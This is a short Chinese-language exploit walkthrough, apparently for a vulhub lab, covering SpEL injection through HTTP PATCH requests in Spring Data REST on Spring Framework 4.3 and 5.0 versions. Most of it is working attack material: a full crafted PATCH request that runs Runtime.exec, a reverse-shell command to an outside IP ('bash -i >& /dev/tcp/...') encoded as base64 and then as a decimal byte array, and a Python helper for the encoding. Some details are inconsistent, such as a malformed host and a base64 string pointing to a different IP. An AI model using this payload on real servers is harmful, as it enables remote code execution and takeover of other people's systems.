参考 文章https://blog.****.net/weixin_41438728/article/details/110425174

影响版本

Spring Framework 5.0 to 5.0.4

Spring Framework 4.3 to 4.3.14

抓取数据包改包

PATCH /customers/1 HTTP/1.1
Host: 192168492:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{
"op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new
java.lang.String(new
byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname",
"value": "vulhub" }]

Content-Type: application/json-patch+json必须改

其中new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success

开始修改命令

1.将bytecode改成反弹shell的命令

执行命令：`bash -i >& /dev/tcp/192.168.49.5/7777 0>& 1`

转换：`bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTAuMTU4LjE5My45Mi8yMjIyIDA+JiAx}|{base64,-d}|{bash,-i}`

改成10进制编码：`[{
"op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new
java.lang.String(new
byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,78,84,65,

117,77,84,85,52,76,106,69,53,77,121,52,53,77,105,56,121,77,106,73,121,73,68,65,43,74,105,65,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastName",
"value": "vulhub" }]`

字符串转ASiiC码的python脚本

import numpy as np

str = 'touch /tmp/success'

ascii = np.fromstring(str, dtype=np.uint8)

print(ascii)

空格改为逗号执行